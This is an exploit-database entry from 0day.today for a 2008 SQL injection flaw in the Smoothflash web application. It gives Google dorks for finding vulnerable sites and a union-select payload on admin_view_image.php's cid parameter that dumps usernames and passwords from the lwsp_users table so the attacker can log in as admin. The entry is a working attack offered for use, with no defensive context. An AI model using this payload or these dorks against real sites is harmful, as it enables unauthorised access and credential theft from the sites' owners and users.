Smoothflash (admin_view_image.php cid) SQL Injection Vulnerability

2008-03-30T00:00:00
ID 1337DAY-ID-2785
Type zdt
Reporter [email protected]
Modified 2008-03-30T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==================================================================
Smoothflash (admin_view_image.php cid) SQL Injection Vulnerability
==================================================================



##########################################
#
# Powered by Smoothflash SQL injection
# Powered by Newartonline
#
###########################################
#
# DORK 1 : "Powered by Smoothflash"
#
# DORK 2 : allinurl: "admin_view_image.php"
#
###########################################
EXPLOiT :

admin_view_image.php?cid=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/lwsp_users


admin login on frontpage

###########################################



#  0day.today [2018-03-14]  #